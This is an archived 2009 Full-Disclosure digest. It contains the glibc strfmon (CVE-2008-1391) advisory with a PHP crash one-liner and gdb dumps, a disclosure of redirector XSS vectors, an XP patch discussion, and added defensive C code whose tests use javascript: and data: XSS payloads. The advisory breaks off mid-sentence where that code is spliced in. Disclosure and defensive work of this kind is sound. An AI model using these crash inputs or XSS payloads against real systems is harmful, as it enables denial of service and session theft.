Hash: SHA1

[ glibc <= 2.10.1 stdio/strfmon.c Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.03.2008
- - Pub.: 17.09.2009

CVE: CVE-2008-1391
Risk: High

Affected Software (tested 27.08.2009):
- - Fedora 11
- - Slackware 12.2
- - Ubuntu 9.04
- - others linux distributions

Original URL:
http://securityreason.com/achievement_securityalert/67

Previous URL:
http://securityreason.com/achievement_securityalert/53

- --- 0.Description ---
strfmon -- convert monetary value to string

The strfmon() function places characters into the array pointed to by s as 
controlled by the string pointed to by format. No
more than maxsize bytes are placed into the array.

The format string is composed of zero or more directives: ordinary characters 
(not %), which are copied unchanged to the output
stream; and
conversion specifications, each of which results in fetching zero or more
subsequent arguments. Each conversion specification is introduced by the %
character.

SYNOPSIS:

#include <monetary.h>

ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);

- --- 1. glibc <= 2.10.1 stdio/strfmon.c Multiple vulnerabilities ---
In March 2008, our team published a security note (SREASONRES:20080325) 
about vulnerabilities in the strfmon(3) function. The issue
was officially diagnosed in NetBSD, FreeBSD and Mac OS X. However, judging from the 
source code, glibc is also vulnerable.
We informed the glibc team. However, the description of the issue and fix was 
not enough for the GNU team. They changed the status
to BOGUS and the response was:

- ---   
And what exactly does a BSD implementation have to do with glibc?
- ---

Today we know that only NetBSD is secure against this, and all systems using glibc are 
affected. Despite the differences between the
NetBSD libc and glibc code, the issue is the same, but the exploit differs from that 
presented in (SREASONRES:20080325).

Description of the vulnerability:
http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325)
http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/

Description of the fix:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc

To present this issue in Fedora 11, we will use the PHP client. money_format() uses the 
strfmon(3) function, so this program is perfect for it.

[...@localhost ~]$ php -r 'money_format("%.1073741821i",1);'
Segmentation fault

for 'money_format("%.1073741821i",1);' we will get

Program received signal SIGSEGV, Segmentation fault.
0x0019331a in __printf_fp () from /lib/libc.so.6

(gdb) bt
#0  0x0019331a in __printf_fp () from /lib/libc.so.6
#1  0x0018832b in __vstrfmon_l () from /lib/libc.so.6
#2  0x00187a36 in strfmon () from /lib/libc.so.6

strfmon() calls __printf_fp() with the overflowed argument. As a result:

(gdb) x/20s ($esi)-10
0x8448ff6:   
0x8448ff7:   
0x8448ff8:   0
0x8448ffa:   
0x8448ffb:   
0x8448ffc:   0
0x8448ffe:   
0x8448fff:   
0x8449000:   Address 0x8449000 out of bounds
0x8449000:   Address 0x8449000 out of bounds
0x8449000:   Address 0x8449000 out of bounds
...
(gdb) i r
eax            0x30       48
ecx            0x0        0
edx            0x0        0
ebx            0x2bdff4   2875380
esp            0xbfffec14 0xbfffec14
ebp            0xbfffed78 0xbfffed78
esi            0x8449000  138711040
edi            0x810c     33036
eip            0x19331a   0x19331a <__printf_fp+3274>

Now let's see what will happen for 'money_format("%.1073741822i",1);'

Program received signal SIGSEGV, Segmentation fault.
0x0034b27b in hack_digit.12295 () from /lib/libc.so.6

php will crash in hack_digit().

(gdb) i r
eax            0x3ffffffe 1073741822
ecx            0x32       50
edx            0x2        2
ebx            0x476ff4   4681716
esp            0xbfffebc4 0xbfffebc4
ebp            0xbfffebf4 0xbfffebf4
esi            0x32       50
edi            0x3e       62

We can try to change the edi register.

For 'money_format("%.1073741824i",1);'
(gdb) i r
eax            0x40000000 1073741824
ecx            0x32       50
edx            0x2        2
ebx            0x35bff4   3522548
esp            0xbfffebbc 0xbfffebbc
ebp            0xbfffebec 0xbfffebec
esi            0x32       50
edi            0x42       66


But let's see what will happen for 'money_format("%.77715949976712904702i", 
1.1);'

crash in
Program received signal SIGSEGV, Segmentation fault.
0x00e4327b in hack_digit.12295 () from /lib/libc.so.6
(gdb) i r
eax            0x3ffffffe 1073741822
ecx            0x34       52
edx            0x2        2
ebx            0xf6eff4   16183284
esp            0xbfffebb4 0xbfffebb4
ebp            0xbfffebe4 0xbfffebe4
esi            0x34       52
edi            0x3e       62

esi 52.

Interestingly, the PHP memory_limit has no control over what happens 
at the level of libc. Function strfmon(3) can
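
The crashes above all start from an attacker-chosen precision field ("%.1073741821i") that strfmon(3) parses into an int and hands on to __printf_fp() after it has overflowed. The wrapper below is an added example, not code from the advisory or from glibc: it walks every conversion specification in a strfmon format string using the grammar from the strfmon(3) manual (flags =f ^ + ( ! -, then width, #left-precision, .right-precision and an i or n conversion), refuses any numeric field above a fixed bound, and only then calls the real strfmon(). STRFMON_FIELD_MAX, the function names and the sample formats are this example's own assumptions.

```c
/* Guarded strfmon(3): refuse format strings whose width or precision
 * fields are large enough to upset the int arithmetic inside libc, before
 * they reach strfmon().  Added example; STRFMON_FIELD_MAX and the function
 * names are this example's own, not glibc's or the advisory's. */
#include <errno.h>
#include <monetary.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Largest width, left precision or right precision we pass through.
 * Any real monetary string needs far less; size it to your buffers. */
#define STRFMON_FIELD_MAX 256

/* Parse a decimal field starting at p.  Returns a pointer past the digits,
 * or NULL if there are no digits or the value exceeds STRFMON_FIELD_MAX.
 * Stopping as soon as the running value passes the bound means this parse
 * cannot overflow itself, however many digits the caller supplies. */
static const char *parse_field(const char *p, int *out)
{
    long v = 0;

    if (*p < '0' || *p > '9')
        return NULL;
    while (*p >= '0' && *p <= '9') {
        v = v * 10 + (*p - '0');
        if (v > STRFMON_FIELD_MAX)
            return NULL;
        p++;
    }
    *out = (int)v;
    return p;
}

/* Check every conversion specification in fmt against the grammar
 *   %[flags][width][#left_prec][.right_prec](i|n)   or   %%
 * where flags are =f ^ + ( ! -.  Returns 1 if every numeric field is
 * within bounds and every conversion character is known, 0 otherwise. */
int strfmon_format_ok(const char *fmt)
{
    const char *p = fmt;
    int field;

    while (*p != '\0') {
        if (*p != '%') {
            p++;
            continue;
        }
        p++;
        if (*p == '%') {                /* literal percent sign */
            p++;
            continue;
        }
        for (;;) {                      /* flags; "=f" consumes a fill char */
            if (*p == '=') {
                if (p[1] == '\0')
                    return 0;
                p += 2;
            } else if (*p == '^' || *p == '+' || *p == '(' ||
                       *p == '!' || *p == '-') {
                p++;
            } else {
                break;
            }
        }
        if (*p >= '0' && *p <= '9') {   /* field width */
            if ((p = parse_field(p, &field)) == NULL)
                return 0;
        }
        if (*p == '#') {                /* left precision */
            if ((p = parse_field(p + 1, &field)) == NULL)
                return 0;
        }
        if (*p == '.') {                /* right precision */
            if ((p = parse_field(p + 1, &field)) == NULL)
                return 0;
        }
        if (*p != 'i' && *p != 'n')     /* unknown or missing conversion */
            return 0;
        p++;
    }
    return 1;
}

/* Replacement for a single-argument strfmon() call: validate, then forward. */
ssize_t safe_strfmon(char *s, size_t maxsize, const char *fmt, double value)
{
    if (!strfmon_format_ok(fmt)) {
        errno = EINVAL;
        return -1;
    }
    return strfmon(s, maxsize, fmt, value);
}

/* Run the wrapper on the advisory's crashing format and on a sane one
 * (both constructed for this example).  Returns 1 if the bad one is refused
 * with EINVAL and the good one formats, 0 otherwise. */
int demo_guard(void)
{
    char buf[64];

    errno = 0;
    if (safe_strfmon(buf, sizeof buf, "%.1073741821i", 1.0) != -1 ||
        errno != EINVAL)
        return 0;
    return safe_strfmon(buf, sizeof buf, "%.2n", 1234.5) >= 0;
}

int main(void)
{
    printf("guard works: %s\n", demo_guard() ? "yes" : "no");
    return 0;
}
```

The bound is deliberately checked while the digits are still being read, so a 20-digit precision like the one in the last crash above is rejected before any conversion to int takes place; a wrapper that first converted with strtol() and then compared would already be working with a wrapped or saturated value.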

Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

2009-09-17 Thread John Morrison
On http://support.microsoft.com/gp/lifepolicy MS says that the
Extended Support Phase includes Security Update Support. If I have
a Premier Support contract (which entitles me to Extended Support)
aren't MS contractually obliged to make this fix available to me?


2009/9/16 Aras Russ Memisyazici nowh...@devnull.com:
 :)

 Thank you all for your valuable comments... Indeed I appreciated some of the
 links/info extended (Susan, Thor and Tom) However, in the end, it sounded
 like:

 a) As a sysadmin in charge of maintaining XP systems along with a whole
 shebang of other mix setups, unless I deploy a better firewall solution, I
 seem to be SOL.

 b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
 earlier, they did the exact same thing back in Win2K days... Nothing new
 here... :/ As Larry and Thor pointed out, what sux is that despite M$
 PROMISING that they would continue supporting XP since they didn't exactly
 state WHAT they would support, they seem to be legally free to actually get
 away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
 to promises...

 So... with all this commentary, in the end, I still didn't read from the
 big'uns on whether or not a 3rd party open-source patch would be
 released... I sure miss the days that people back in the day who cared would
 :) In the end I realize, it sounds like a total over-haul of the TCP/IP
 stack is required; but does it really have to? Really?

 How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
 suggesting switching to an iptables based protection along with a registry
 tweak... ahh the good ol' batch firewall :) Would this actually work as a
 viable work-around? I realize M$ stated this as such, but given their
 current reputation it's really hard to take their word for anything these
 days :P

 What free/cheap client-level-IPS solutions block this current attack? Any
 suggestions?

 Thank you for your time and look forward to some more answers.

 Sincerely,
 Aras Russ Memisyazici
 arasm {at) vt ^dot^ edu  -- I set my return addy to /dev/null for... well
 you know why!

 Systems Administrator
 Virginia Tech

 -Original Message-
 From: Larry Seltzer [mailto:la...@larryseltzer.com]
 Sent: Wednesday, September 16, 2009 5:03 PM
 To: Susan Bradley; Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

 Yes, they used the bulletin to soft-pedal the description, but at the
 same time I think they send a message about XP users being on shaky
 ground. Just because they've got 4+ years of Extended Support Period
 left doesn't mean they're going to get first-class treatment.

 Larry Seltzer
 Contributing Editor, PC Magazine
 larry_selt...@ziffdavis.com
 http://blogs.pcmag.com/securitywatch/


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
 Bradley
 Sent: Wednesday, September 16, 2009 2:26 PM
 To: Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

 It's only default for people running XP standalone/consumer that are
 not even in a home network settings.

 That kinda slices and dices that default down to a VERY narrow sub sub
 sub set of customer base.

 (Bottom line, yes, the marketing team definitely got a hold of that
 bulletin)

 Thor (Hammer of God) wrote:
 Yeah, I know what it is and what it's for ;)  That was just my subtle
 way of trying to make a point.  To be more explicit:

 1)  If you are publishing a vulnerability for which there is no patch,
 and for which you have no intention of making a patch for, don't tell me
 it's mitigated by ancient, unusable default firewall settings, and don't
 withhold explicit details.  Say THERE WILL BE NO PATCH, EVER.  HERE'S
 EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK.  Also, don't say
 'you can deploy firewall settings via group policy to mitigate exposure'
 when the firewall obviously must be accepting network connections to get
 the settings in the first place. If all it takes is any listening
 service, then you have issues.  It's like telling me that the solution
 is to take the letter 'f' out of the word solution.

 2)  Think things through.  If you are going to try to boost sales of
 Win7 to corporate customers by providing free XP VM technology and thus
 play up how important XP is and how many companies still depend upon it
 for business critical application compatibility, don't deploy that
 technology in an other-than-default configuration that is subject to a
 DoS exploit while downplaying the extent that the exploit may be
 leveraged by saying that a typical default configuration mitigates it
 while choosing not to ever patch it.    Seems like simple logic points
 to me.

 t


 -Original Message-
 From: 

Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

2009-09-17 Thread Aras Russ Memisyazici
:)

Thank you all for your valuable comments... Indeed I appreciated some of the
links/info extended (Susan, Thor and Tom) However, in the end, it sounded
like:

a) As a sysadmin in charge of maintaining XP systems along with a whole
shebang of other mix setups, unless I deploy a better firewall solution, I
seem to be SOL.

b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
PROMISING that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...

So... with all this commentary, in the end, I still didn't read from the
big'uns on whether or not a 3rd party open-source patch would be
released... I sure miss the days that people back in the day who cared would
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?

How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P

What free/cheap client-level-IPS solutions block this current attack? Any
suggestions?

Thank you for your time and look forward to some more answers.

Sincerely,
Aras Russ Memisyazici
arasm {at) vt ^dot^ edu  -- I set my return addy to /dev/null for... well
you know why!

Systems Administrator
Virginia Tech

-Original Message-
From: Larry Seltzer [mailto:la...@larryseltzer.com] 
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.

Larry Seltzer
Contributing Editor, PC Magazine
larry_selt...@ziffdavis.com 
http://blogs.pcmag.com/securitywatch/


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

It's only default for people running XP standalone/consumer that are 
not even in a home network settings.

That kinda slices and dices that default down to a VERY narrow sub sub 
sub set of customer base.

(Bottom line, yes, the marketing team definitely got a hold of that 
bulletin)

Thor (Hammer of God) wrote:
 Yeah, I know what it is and what it's for ;)  That was just my subtle
way of trying to make a point.  To be more explicit:

 1)  If you are publishing a vulnerability for which there is no patch,
and for which you have no intention of making a patch for, don't tell me
it's mitigated by ancient, unusable default firewall settings, and don't
withhold explicit details.  Say THERE WILL BE NO PATCH, EVER.  HERE'S
EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK.  Also, don't say
'you can deploy firewall settings via group policy to mitigate exposure'
when the firewall obviously must be accepting network connections to get
the settings in the first place. If all it takes is any listening
service, then you have issues.  It's like telling me that the solution
is to take the letter 'f' out of the word solution.

 2)  Think things through.  If you are going to try to boost sales of
Win7 to corporate customers by providing free XP VM technology and thus
play up how important XP is and how many companies still depend upon it
for business critical application compatibility, don't deploy that
technology in an other-than-default configuration that is subject to a
DoS exploit while downplaying the extent that the exploit may be
leveraged by saying that a typical default configuration mitigates it
while choosing not to ever patch it.  Seems like simple logic points
to me.

 t

   
 -Original Message-
 From: Susan Bradley [mailto:sbrad...@pacbell.net]
 Sent: Wednesday, September 16, 2009 10:16 AM
 To: Thor (Hammer of God)
 Cc: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

 It's XP.  Running in RDP mode.  It's got IE6, and wants antivirus.
Of
 course it's vulnerable to any and all gobs of stuff out there.  But
 

[Full-disclosure] Cross-Site Scripting attacks via redirectors in different browsers

2009-09-17 Thread MustLive
Hello Full-Disclosure!

I already sent this letter to Bugtraq on the 6th of September, but they declined
to post it without any explanation - maybe it was due to some political
reasons :-). We'll see how it goes with your list.

At the end of July I published my article "Cross-Site Scripting attacks via
redirectors" (http://websecurity.com.ua/3376/), and on the 4th of August I
published the English version of my article (http://websecurity.com.ua/3386/).
In this article I wrote about using redirectors in different browsers for
conducting Cross-Site Scripting attacks.

In the article I wrote about XSS attacks in location-header and
refresh-header redirectors in different browsers: Mozilla 1.7.x, Mozilla
Firefox 3.x, Internet Explorer (IE6), Opera 9.x and Google Chrome 1.x. And
after additional research in August I found that the following browsers are
also vulnerable: Google Chrome 2.x and 3.x, QtWeb, Safari, Opera 10.00 Beta 3,
SeaMonkey, Firefox 3.6 a1 pre, Firefox 3.7 a1 pre, Orca Browser and Maxthon
3 Alpha.

I wrote about five methods of attack in the article (via location-header and
refresh-header redirectors); four of them I already posted to Bugtraq. In
this letter I'll inform you about new browsers vulnerable to those
vulnerabilities which I wrote to Bugtraq about before.

So in my article Cross-Site Scripting attacks via redirectors
(http://websecurity.com.ua/3386/) I wrote about five attack vectors:

Attack #1 -  via refresh-header redirector to javascript: URI
(http://www.securityfocus.com/archive/1/504718).

Attack #2 -  via refresh-header redirector to data: URI
(http://www.securityfocus.com/archive/1/504972/30/300/threaded).

Attack #3 -  via location-header redirector to data: URI
(http://www.securityfocus.com/archive/1/505479/30/270/threaded).

Attack #4 -  via location-header redirector (which uses the answer "302 Object
moved") to javascript: URI (http://www.securityfocus.com/archive/1/506163)

Attack #5 -  via location-header redirector (which uses any 301 and 302
answers) to javascript: URI.

After the first release of the article, I found new vulnerable browsers with
the help of Aung Khant from YEHG Team.

The following browsers are also vulnerable:

Mozilla Firefox 3.0.13 - vulnerable to attacks #2,3,4.

Google Chrome 2.0.172.28, 2.0.172.37 and 3.0.193.2 Beta - vulnerable to
attacks #1,2.

QtWeb 3.0 Build 001 and 3.0 Build 003 - vulnerable to attacks #1,2,3.

Safari 4.0.3 - vulnerable to attacks #1,2.

Opera 10.00 Beta 3 Build 1699 - vulnerable to attacks #1,3.

SeaMonkey 1.1.17 - vulnerable to attacks #1,2,4.

Firefox 3.6 a1 pre - vulnerable to attacks #1,2,3,4.

Firefox 3.7 a1 pre - vulnerable to attacks #2,3,4.

Orca Browser 1.2 build 5 - vulnerable to attacks #2,3,4.

Maxthon 3 Alpha (3.0.0.145) with Ultramode (Apple's WebKit emulation) -
vulnerable to attacks #1,2. And also vulnerable to attacks #3,4,5 as
"Strictly social" XSS.

Maxthon 3 Alpha is the only browser vulnerable to attack #5 (for now). Attack #5
is similar to attack #4; it just works in all location-header redirectors.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
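
All five attack vectors in the post above need two things: a redirector that copies an attacker-controlled target into a Location or Refresh header, and a browser that then honours a javascript: or data: URI arriving that way. Whatever the browser does, the redirector can refuse to emit such a target. The function below is an added example, not code from MustLive's article: it shows the server-side check a redirect endpoint should apply to the URL-decoded target before writing the header. The accept policy (site-relative paths and absolute http/https URLs only), the function names and the sample targets are assumptions of this example.

```c
/* Server-side guard for a redirector endpoint: decide whether a decoded,
 * user-supplied target may be copied into a Location: (or Refresh:) header.
 * Added example, not code from the article; the policy is an assumption. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if target may be redirected to, 0 if it must be refused.
 * Accepted: a site-relative path such as "/account?tab=1", or an absolute
 * http/https URL.  Refused: every other scheme (javascript:, data:,
 * vbscript:, ...), scheme-relative "//host", a backslash anywhere, and any
 * control or whitespace byte, so a decoded "%0d%0a" cannot inject a second
 * header and "java<TAB>script:" cannot slip past the scheme comparison.
 * Apply it to the value after URL decoding, which is what the browser sees. */
int redirect_target_ok(const char *target)
{
    size_t n = strlen(target), i;
    const char *colon;
    char scheme[8];

    if (n == 0 || n > 2048)
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)target[i];
        if (c <= 0x20 || c == 0x7f || c == '\\')
            return 0;
    }
    if (target[0] == '/')                   /* site-relative path ... */
        return target[1] != '/';            /* ... but not "//evil.example" */

    colon = strchr(target, ':');
    if (colon == NULL)
        return 0;                           /* bare "foo": keep the policy strict */
    if ((size_t)(colon - target) >= sizeof scheme)
        return 0;                           /* longer than "https": never allowed */
    for (i = 0; target[i] != ':'; i++)
        scheme[i] = (char)tolower((unsigned char)target[i]);
    scheme[i] = '\0';
    if (strcmp(scheme, "http") != 0 && strcmp(scheme, "https") != 0)
        return 0;
    /* insist on "scheme://host...": a non-empty authority component */
    return strncmp(colon, "://", 3) == 0 && colon[3] != '\0' && colon[3] != '/';
}

/* Write the status line and Location header for target into out.  Returns
 * the number of bytes written, or -1 if the target was refused or out is
 * too small; on -1 the caller should answer 400 rather than redirect. */
int build_redirect_headers(char *out, size_t outlen, const char *target)
{
    int len;

    if (!redirect_target_ok(target))
        return -1;
    len = snprintf(out, outlen,
                   "HTTP/1.1 302 Found\r\nLocation: %s\r\n\r\n", target);
    return (len < 0 || (size_t)len >= outlen) ? -1 : len;
}

int main(void)
{
    /* Constructed candidates mirroring the attack vectors in the post. */
    const char *targets[] = {
        "/account?tab=1",
        "https://example.com/login",
        "javascript:alert(document.cookie)",
        "data:text/html,<script>alert(1)</script>",
        "//evil.example/",
        "http://example.com/%0d%0aSet-Cookie:a=b",   /* still encoded: fine */
    };
    char hdr[256];
    size_t i;

    for (i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        int n = build_redirect_headers(hdr, sizeof hdr, targets[i]);
        printf("%-45s %s\n", targets[i], n < 0 ? "refused" : "redirect");
    }
    return 0;
}
```

Note the last sample: an encoded "%0d%0a" passes, because the check is meant to run on the decoded value the application actually writes into the header; once decoded, the CR and LF bytes are rejected. Allow-listing two schemes is simpler and safer than trying to block-list javascript:, data: and whatever the next browser adds.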

[Full-disclosure] List Charter

2009-09-17 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclos...@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd

2009-09-17 Thread Jubei Trippataka
 WTF is up with this mailing list? I signed up a few weeks ago expecting
 full disclosure of security exploits or at least good security discussion.
 Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be.

 BMF



I'm sorry, all I read there was WHINE WHINE FUCKIN WHINE.

-- 
ciao

JT
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/